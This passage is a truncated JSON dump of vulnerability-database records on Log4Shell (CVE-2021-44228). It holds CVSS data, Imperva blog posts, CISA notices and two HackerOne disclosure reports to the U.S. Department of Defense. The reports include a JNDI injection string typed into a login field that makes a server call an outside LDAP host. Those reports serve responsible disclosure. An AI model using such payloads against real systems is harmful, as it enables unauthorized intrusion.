Security", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T15:23:02", "id": "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "href": "https://www.imperva.com/blog/analytics-are-essential-for-effective-database-security/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T06:45:07", "description": "Since it was disclosed on Friday, December 11, I have spoken with many customers about CVE-2021-44228 and the ways Imperva is working to ensure that [they are protected](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>). Countless others have contacted us with questions about ways to mitigate the impact from the Log4j vulnerability. \n\nIn the spirit of transparency and information sharing, we\u2019ve aggregated below the most common questions we\u2019ve received to date and the answers we\u2019ve been providing to assist our customers through this time. \n\nThis is a complex and evolving situation -- one that takes partnership, diligence and patience. The global Imperva team is dedicated to helping you. We will continue to keep you informed with additional information as it becomes available.\n\n**Q: What is the state of Imperva\u2019s Application Security product posture?**\n\nA: Imperva Cloud Web Application Firewall (WAF), Imperva WAF Gateway and Imperva RASP were not affected by CVE-2021-44228. All Application Security products have the ability to detect and block exploits targeting the CVE.\n\n**Q: Is Imperva implementing rule changes for the Imperva Cloud Web Application Firewall (WAF) to combat Apache Log4j2?**\n\nA: Absolutely. We\u2019ve deployed a dozen security rule updates since CVE-2021-44228 was disclosed to help our customers mitigate new attack variants.\n\nWe saw initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC. As said in our initial blog post, our existing security rules put in place for Imperva Cloud WAF customers mitigated these early CVE attacks without requiring any patching. \n\nImperva Threat Research detected new CVE-specific attack variants, resulting in the creation of additional security rules on December 10, 2021 at 5:41 UTC. These updates were tested and deployed to the Imperva Global Network and ThreatRadar Feed on December 10, 2021 at 11:44 UTC. \n\nOver the last few days, we\u2019ve detected new variants and responded by creating and deploying updated rules. Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules based on new attack variants. \n\n**Q: What rule changes are being implemented for Imperva WAF Gateway (GW) to combat Apache Log4j2?**\n\nA: After monitoring initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC, Imperva Threat Research immediately began creating additional security rules for Imperva WAF GW. \n\nManual rules were supplied to Imperva WAF GW customers to mitigate CVE-specific attacks. An Imperva Documentation [knowledge base article](<https://docs.imperva.com/howto/9111b8a5>) (login required) contains the signature information for creating the specific rule. This document was updated as of December 13, 2021 15:30 UTC.\n\nCustomers that have Threat Radar Emergency Feed Services received an initial update with these CVE-specific rules on December 10, 2021 11:30 UTC. As new variants were discovered, updated rules were published to Threat Radar on December 11, 2021 10:30 UTC, December 11, 2021 3:30 UTC and December 13, 2021 12:20 UTC.\n\nCustomers using Imperva Application Defense Center (ADC) were able to receive an update on December 13, 2021 at 10:00 UTC. ADC content can be updated manually or automatically. For information about configuring ADC, please visit the [ADC Update Guide](<https://docs.imperva.com/bundle/v12.6-administration-guide/page/6874.htm>).\n\nJust like for Cloud WAF, Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules for WAF GW based on new attack variants. \n\n**Q: For both Imperva Cloud WAF and Imperva WAF GW, where can I see if I am getting hit by traffic related to this Remote Code Execution (RCE) exploit? Is there a dashboard to help me?**\n\nA: Imperva Cloud WAF customers can see the CVE\u2019s activity in Imperva Attack Analytics (screenshot below).\n\nIncidents in Imperva Attack Analytics can be filtered by this specific CVE (screenshot below).\n\nOnce Imperva WAF GW customers establish the appropriate signatures (manually, via Threat Radar or via ADC), they will be able to see alerts and block events within the MX or within their SIEM, where log events are ingested. The default logging templates should include signature names and events like \u201cCVE-2021-44228: Zero day RCE in Log4j2 via LDAP JNDI parser\u201d.\n\n**Q: If I have Imperva RASP deployed across my Java applications, am I protected?**\n\nA: Yes. Given the nature of how Imperva RASP works, RCEs caused by CVE-2021-44228 were stopped without requiring any code changes or policy updates (additional details below). Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected if Imperva RASP is currently deployed.\n\n**Q: What types of vulnerabilities does Imperva RASP protect out of the box?**\n\nA: Imperva RASP is complementary to Imperva WAF. While the latter keeps bad traffic out, RASP mitigates the risk posed by unknown exploits in first or third-party code/dependencies. By being embedded in the application, RASP has direct visibility into attacks relating to a RCE, which is an advantage for detecting and stopping a specific class of attack.\n\n**Q: Where can I learn more about Imperva RASP? **\n\nA: Imperva RASP is an industry-leading product that is designed to protect against zero-days and the OWASP Top 10 application security threats, injections and weaknesses. Learn more [here](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>).\n\n**Q: Is the Log4j vulnerability impacting any of Imperva's corporate systems (including customer/partner portals and FTP)?**\n\nA: No. Imperva worked quickly to update all vulnerable systems immediately after becoming aware of CVE-2021-44228, including third-party vendor solutions. Additionally, Imperva does not have any corporate external systems that are affected by this specific CVE.\n\n**Q: I need assistance or have questions. Who should I contact?**\n\nA: For customers looking for support, please access the [Imperva Support Portal](<https://support.imperva.com/s/login/?ec=302&startURL=%2Fs%2F>). If you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions ](<https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:55:49", "type": "impervablog", "title": "Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T22:55:49", "id": "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "href": "https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-28T14:37:22", "description": "It's been another chaotic year in cybersecurity, as protecting web applications and stopping sensitive data breaches remain top-of-mind issues and continue to generate headline news.\n\nAs 2021 comes to a close, cybersecurity and all the industries it serves is dealing with an unprecedented zero-day vulnerability in the form of CVE-2021-44228 - just 12 months after the Sunburst attack that made global news. While there were many topics that garnered attention this year, here are five that you should follow into 2022.\n\n## 5\\. [**Bad Bot Report 2021: The Pandemic of the Internet**](<https://www.imperva.com/blog/bad-bot-report-2021-the-pandemic-of-the-internet/>)\n\n### Why bad bots deserve your attention\n\nIn 2020, a record-breaking quarter of all internet traffic originated from bad bots, and the malicious traffic they create has wreaked havoc across multiple industries. The **Bad Bot Report 2021** revealed that 57.1 percent of this traffic came from Advanced Persistent Bots (APBs). These bots often avoid detection by cycling through random IP addresses, entering through anonymous proxies, changing their identities, and mimicking human behavior and they are plaguing websites like never before. Bad bots have remained very troublesome this holiday season - check out [Imperva CEO Pam Murphy](<https://www.cbsnews.com/news/automated-bots-holiday-season-shopping/>) explaining the scope of the problem on CBS News.\n\n### Where to get help\n\nImperva [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) (ABP) protects eCommerce platforms from bad bots like Grinchbots that abuse business logic and make it nearly impossible for human customers to buy. ABP protects your real eCommerce traffic without any dropoff in website performance, ensuring an optimal customer experience and business continuity. Advanced Bot Protection can mitigate all OWASP automated threats including scalping, account takeover, web scraping and more.\n\n## 4\\. [How to Stop DDoS Attacks on Online Gamers](<https://www.imperva.com/blog/game-over-how-to-stop-ddos-attacks-on-online-gamers/>)\n\n### Why DDoS attacks on gaming deserve your attention\n\nGamers are high-value targets for cyber attackers; their high-spec machines alone are a valuable resource for cryptocurrency miners, not to mention attacks on players, platforms and studios. Anyone can launch a DoS/DDoS attack on individual gamers or entire networks, without programming knowledge. \u201cDDoS as a Service\u201d attacks can be rented online for as little as $10, complete with technical support. And if the bad guys can do it to a Fortnite World Cup team, they can do it to you, too.\n\n### Where to get help\n\nGaming platform or not, if you are interested in protecting your infrastructure from attack, you can [learn more here](<https://www.imperva.com/products/infrastructure-ddos-protection-services/>) about how Imperva can keep your players safe on the digital landscape. If you\u2019re an ISP, you can find out more about protecting against network take-downs by DDoS and bad bots [here](<https://www.imperva.com/solutions/protection-for-telecoms-and-isps/>).\n\n## [3\\. Why Data Security and Privacy in the Digital Age are Crucial](<https://www.imperva.com/blog/why-data-security-and-privacy-in-the-digital-age-are-crucial/>)\n\n### Why data privacy deserves your attention\n\nFor many years, people have trusted organizations like banks and healthcare to handle their most sensitive personal and financial information. Today, in a highly-connected and digitized world, the routes to accessing that data have multiplied, making it much more vulnerable to a breach. A data breach can have catastrophic consequences in any industry, but they are particularly disastrous for enterprises that have built their customer base on trust. With so many tech newcomers waiting to take their customers, a publicly-announced data breach could erode that trust enough to create serious financial fallout for an organization.\n\n### Where to get help\n\n[Imperva Data Privacy](<https://www.imperva.com/products/data-privacy/>) reaches down into the intelligence layer and cuts through the massive quantities of raw data to make it easier and less costly to discover, classify, and analyze sensitive data. You can automatically probe your organization\u2019s data for specific types of sensitive data and trigger appropriate action when required. Armed with this functionality, organizations can automate subject right request responses, delete sensitive personal data on-demand, and prove regulation compliance to auditors. You can [start for free today](<https://www.imperva.com/free-trial/?prod=cloud-data-security>).\n\n## [2\\. Software Supply Chain Attacks: From Formjacking to Third Party Code Changes](<https://www.imperva.com/blog/software-supply-chain-attacks-from-formjacking-to-third-party-code-changes/>)\n\n### Why software supply chain attacks deserve your attention\n\nToday, vulnerabilities are being introduced in even the most rigorous software development lifecycle. And as we know, traditional application scanning tools are failing to identify every vulnerability. As your organization becomes more dependent on third-party software components and your applications and [APIs](<https://www.imperva.com/learn/application-security/web-api-security/>) are exposed to additional risk exposure, you\u2019ll need proactive controls to mitigate the impact of these new supply chain attack vectors.\n\n### Where to get help\n\nFor supply chain attacks aimed at establishing a foothold and moving laterally across your network, you need a fast and easy way to mitigate risks with a positive security model that analyzes an application\u2019s behavior. By identifying all expected activity, you easily expose high-risk and suspicious behavior. Imperva\u2019s [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) uses a lightweight security plug-in to clearly analyze activity within the application to block unwanted actions, such as a third-party library suddenly establishing a network connection to an external site for C2. RASP protects applications, runtime, servers, open-source dependencies, and third-party libraries. Imperva RASP deploys in minutes by easily snapping into an application without requiring any code changes, and it requires no ongoing signature updates. [Learn more.](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>)\n\n## [1 How Imperva Is Protecting Customers & Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>)\n\n### Why CVE-2021-44228 deserves your attention\n\nThis [zero-day vulnerability](<https://www.imperva.com/learn/application-security/zero-day-exploit/>) has only been with us for a couple of weeks, but it\u2019s taking up a lot of air, and with good reason. CVE-2021-44228 allows for unauthenticated remote code execution and is having a big impact on all organizations running Java workloads. Security teams are scrambling to immediately patch their software and upgrade third-party components to meet SLAs. Initial attack peaks reached roughly 280K/hour and as with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\n### Where to get help\n\nImplementing [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) provides a broader defense-in-depth strategy for enterprises to protect their applications and APIs. Some Imperva customers, including from the eCommerce and Telecom industries, have been able to save thousands of hours in emergency patching and speed up the secure software development lifecycle. Customers that have RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.\n\nThe post [2021 in Review, Part 1: 5 Cybersecurity Topics that Made News](<https://www.imperva.com/blog/2021-in-review-part-1-5-cybersecurity-topics-that-made-news/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-28T14:08:23", "type": "impervablog", "title": "2021 in Review, Part 1: 5 Cybersecurity Topics that Made News", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T14:08:23", "id": "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "href": "https://www.imperva.com/blog/2021-in-review-part-1-5-cybersecurity-topics-that-made-news/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2021-12-10T20:39:02", "description": "The post [Update on Log4Shell (CVE-2021-44228)](<https://lab.wallarm.com/update-on-log4shell-cve-2021-44228/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {}, "published": "2021-12-10T20:22:36", "type": "wallarmlab", "title": "Update on Log4Shell (CVE-2021-44228)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T20:22:36", "id": "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "href": "https://lab.wallarm.com/update-on-log4shell-cve-2021-44228/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-10T22:37:12", "description": "The post [5 things you need to know about Log4Shell (CVE-2021-44228)](<https://lab.wallarm.com/5-things-you-need-to-know-about-log4shell-cve-2021-44228/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {}, "published": "2021-12-10T20:40:07", "type": "wallarmlab", "title": "5 things you need to know about Log4Shell (CVE-2021-44228)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T20:40:07", "id": "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884", "href": "https://lab.wallarm.com/5-things-you-need-to-know-about-log4shell-cve-2021-44228/", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-05-23T16:48:29", "bounty": 0.0, "description": "#Report\n\n**Description:**\n\nhttps://vulners.com/cve/CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588https%3A%2F%2F\u2588\u2588\u2588%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.\n\n\n\n#Activity Timeline\n\n2021-12-10 18:16 (-0600) (comment)\nGreetings from the Department of Defense (DoD),\n\nThank you for supporting the DoD Vulnerability Disclosure Program (VDP).\n\nBy submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.\n\nThe VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.\n\nWe will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action.\n\nOur goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.\n\nRegards,\n\nThe VDP Team\n\n---\n\n2021-12-13 08:29 (-0600): @agent-l8 (report severity updated)\nnull\n\n---\n\n2021-12-13 08:29 (-0600): @agent-l8 (bug triaged)\nGreetings,\n\nWe have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.\n\nThank you for bringing this vulnerability to our attention!\n\nWe will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.\n\nYou will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.\n\nThanks again for supporting the DoD Vulnerability Disclosure Program.\n\nRegards,\n\nThe VDP Team\n\n---\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T00:55:49", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 running a vulnerable log4j", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T19:35:32", "id": "H1:1438393", "href": "https://hackerone.com/reports/1438393", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:48:28", "bounty": 0.0, "description": "**Description:**\n\nhttps://vulners.com/cve/CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588https%3A%2F%2F\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T00:16:38", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 running a vulnerable log4j", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T19:33:44", "id": "H1:1423496", "href": "https://hackerone.com/reports/1423496", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-06-24T13:56:24", "description": "CISA and the United States Coast Guard Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon\u00ae and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches. The CSA provides information\u2014including tactics, techniques, and procedures and indicators of compromise\u2014derived from two related incident response engagements and malware analysis of samples discovered on the victims\u2019 networks.\n\nCISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following [VMware\u2019s release of updates for Log4Shell](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>), treat all affected VMware systems as compromised. See joint CSA [Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems](<https://www.cisa.gov/uscert/ncas/alerts/aa22-174a>) for more information and additional recommendations. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-23T00:00:00", "type": "cisa", "title": "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-23T00:00:00", "id": "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T18:09:48", "description": "CISA has issued [Emergency Directive (ED) 22-02: Mitigate Apache Log4j Vulnerability](<https://www.cisa.gov/emergency-directive-22-02>), directing federal civilian executive branch (FCEB) agencies to address Log4j vulnerabilities\u2014most notably, [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>).\n\nAlthough ED 22-02 applies to FCEB agencies, CISA strongly recommends that all organizations review [ED 22-02](<https://www.cisa.gov/emergency-directive-22-02>) for mitigation guidance. For additional details, see CISA\u2019s webpage [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T00:00:00", "type": "cisa", "title": "CISA Issues ED 22-02 Directing Federal Agencies to Mitigate Apache Log4j Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T00:00:00", "id": "CISA:920F1DA8584B18459D4963D91C8DDA33", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:08:18", "description": "CISA and its partners, through the [Joint Cyber Defense Collaborative](<https://www.cisa.gov/jcdc>), are tracking and responding to active, widespread exploitation of a critical remote code execution vulnerability (CVE-2021-44228) affecting Apache Log4j software library versions 2.0-beta9 to 2.14.1. Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications\u2014as well as in operational technology products\u2014to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.\n\nIn response, CISA has created a webpage, [Apache Log4j Vulnerability Guidance](<https://cisa.gov/uscert/apache-log4j-vulnerability-guidance>) and will actively maintain a [community-sourced GitHub repository](<https://github.com/cisagov/log4j-affected-db>) of publicly available information and vendor-supplied advisories regarding the Log4j vulnerability. CISA will continually update both the webpage and the GitHub repository.\n\nCISA urges organizations to review its [Apache Log4j Vulnerability Guidance](<https://cisa.gov/uscert/apache-log4j-vulnerability-guidance>) webpage and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately. CISA will continue to update the webpage as additional information becomes available. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/13/cisa-creates-webpage-apache-log4j-vulnerability-cve-2021-44228>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:00:00", "type": "cisa", "title": "CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 